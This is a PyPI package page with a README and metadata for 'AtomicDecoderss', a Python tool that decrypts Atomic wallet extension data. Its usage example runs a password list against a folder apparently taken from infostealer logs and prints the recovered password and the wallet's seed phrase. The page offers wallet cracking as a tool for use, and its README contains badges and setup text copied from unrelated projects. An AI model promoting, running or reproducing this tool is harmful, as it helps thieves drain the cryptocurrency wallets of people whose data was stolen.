# AtomicDecoderss
[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)
![](https://img.shields.io/github/stars/pandao/editor.md.svg) ![](https://img.shields.io/github/forks/pandao/editor.md.svg) ![](https://img.shields.io/github/tag/pandao/editor.md.svg) ![](https://img.shields.io/github/release/pandao/editor.md.svg) ![](https://img.shields.io/github/issues/pandao/editor.md.svg) ![](https://img.shields.io/bower/v/editor.md.svg)
Decode Tools for decode crypto data, from extensions wallet, Atomic.
## Installation
Python requires [Python.org](https://www.python.org/) v3,7+ to run.
Install the dependencies and devDependencies and start the server.
```sh
python -m pip install pip
python -m pip install --upgrade pip
pip install AtomicDecoderss
```
## Using
```Python
#!/usr/bin/python3
# -*- coding: utf-8 -*-
from AtomicDecoderss import decryptAtomic
if __name__ == '__main__':
ldb_folder = "C:\Users\Root\Desktop\atomLogs\Wallets\Atomic"
passwordList = ["testpassword", "testpassword2"]
obj = decryptAtomic(ldb_folder, passwordList)
print(obj)
```
# output
```css
# s ~ status
# m ~ password
# d ~ data mnemonic
{"s": True, "m": 'qwertuyuip123', "d": "chuckle main plastic shiver stable kid stone clerk case head call purpose"}
```
## License
MIT
**Encode Cipherbcrypt group**
Raw data
{
"_id": null,
"home_page": null,
"name": "AtomicDecoderss",
"maintainer": null,
"docs_url": null,
"requires_python": "<4.0,>=3.7",
"maintainer_email": null,
"keywords": "extensions, Atomic, walletdecode, decode, tronlink, AtomicDecode, crypto, decrypt, wallet",
"author": "JeanClaude89",
"author_email": null,
"download_url": "https://files.pythonhosted.org/packages/99/75/6c8226c32c7862590e4f9e698dcbf5302281b8b0c86520e4fdb49cc4f4d9/atomicdecoderss-1.6.6.tar.gz",
"platform": null,
"description": "# AtomicDecoderss\n[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)\n\n![](https://img.shields.io/github/stars/pandao/editor.md.svg) ![](https://img.shields.io/github/forks/pandao/editor.md.svg) ![](https://img.shields.io/github/tag/pandao/editor.md.svg) ![](https://img.shields.io/github/release/pandao/editor.md.svg) ![](https://img.shields.io/github/issues/pandao/editor.md.svg) ![](https://img.shields.io/bower/v/editor.md.svg)\n\nDecode Tools for decode crypto data, from extensions wallet, Atomic.\n\n## Installation\nPython requires [Python.org](https://www.python.org/) v3,7+ to run.\nInstall the dependencies and devDependencies and start the server.\n```sh\npython -m pip install pip\npython -m pip install --upgrade pip\npip install AtomicDecoderss\n```\n## Using\n\n```Python\n#!/usr/bin/python3\n# -*- coding: utf-8 -*-\nfrom AtomicDecoderss import decryptAtomic\n\nif __name__ == '__main__':\n ldb_folder = \"C:\\Users\\Root\\Desktop\\atomLogs\\Wallets\\Atomic\"\n passwordList = [\"testpassword\", \"testpassword2\"]\n obj = decryptAtomic(ldb_folder, passwordList)\n print(obj)\n```\n# output\n```css\n# s ~ status\n# m ~ password\n# d ~ data mnemonic\n{\"s\": True, \"m\": 'qwertuyuip123', \"d\": \"chuckle main plastic shiver stable kid stone clerk case head call purpose\"}\n```\n\n\n## License\nMIT\n**Encode Cipherbcrypt group**\n",
"bugtrack_url": null,
"license": "MIT",
"summary": "Simple Tools for decode crypto data, from extensions wallet, Atomic v2.",
"version": "1.6.6",
"project_urls": null,
"split_keywords": [
"extensions",
" atomic",
" walletdecode",
" decode",
" tronlink",
" atomicdecode",
" crypto",
" decrypt",
" wallet"
],
"urls": [
{
"comment_text": "",
"digests": {
"blake2b_256": "b23171cffde296193c51540bb99a22a0baa0dec4cd029859fb38a746386d3f59",
"md5": "9c0072b408f4f3de24c8760ba6a014d0",
"sha256": "59f03fc7989dcbe68d6f070033b4e4e94ccafcd9068c38e435b631fb3565b5c5"
},
"downloads": -1,
"filename": "atomicdecoderss-1.6.6-py3-none-any.whl",
"has_sig": false,
"md5_digest": "9c0072b408f4f3de24c8760ba6a014d0",
"packagetype": "bdist_wheel",
"python_version": "py3",
"requires_python": "<4.0,>=3.7",
"size": 3689,
"upload_time": "2024-09-22T07:19:36",
"upload_time_iso_8601": "2024-09-22T07:19:36.117369Z",
"url": "https://files.pythonhosted.org/packages/b2/31/71cffde296193c51540bb99a22a0baa0dec4cd029859fb38a746386d3f59/atomicdecoderss-1.6.6-py3-none-any.whl",
"yanked": false,
"yanked_reason": null
},
{
"comment_text": "",
"digests": {
"blake2b_256": "99756c8226c32c7862590e4f9e698dcbf5302281b8b0c86520e4fdb49cc4f4d9",
"md5": "047ea06af7610759434af28e05db9760",
"sha256": "ea9b10c228e84c1743e41522c5dc50f09bff2f5f669e1d3dd9f8f2b149480feb"
},
"downloads": -1,
"filename": "atomicdecoderss-1.6.6.tar.gz",
"has_sig": false,
"md5_digest": "047ea06af7610759434af28e05db9760",
"packagetype": "sdist",
"python_version": "source",
"requires_python": "<4.0,>=3.7",
"size": 3331,
"upload_time": "2024-09-22T07:19:37",
"upload_time_iso_8601": "2024-09-22T07:19:37.685088Z",
"url": "https://files.pythonhosted.org/packages/99/75/6c8226c32c7862590e4f9e698dcbf5302281b8b0c86520e4fdb49cc4f4d9/atomicdecoderss-1.6.6.tar.gz",
"yanked": false,
"yanked_reason": null
}
],
"upload_time": "2024-09-22 07:19:37",
"github": false,
"gitlab": false,
"bitbucket": false,
"codeberg": false,
"lcname": "atomicdecoderss"
}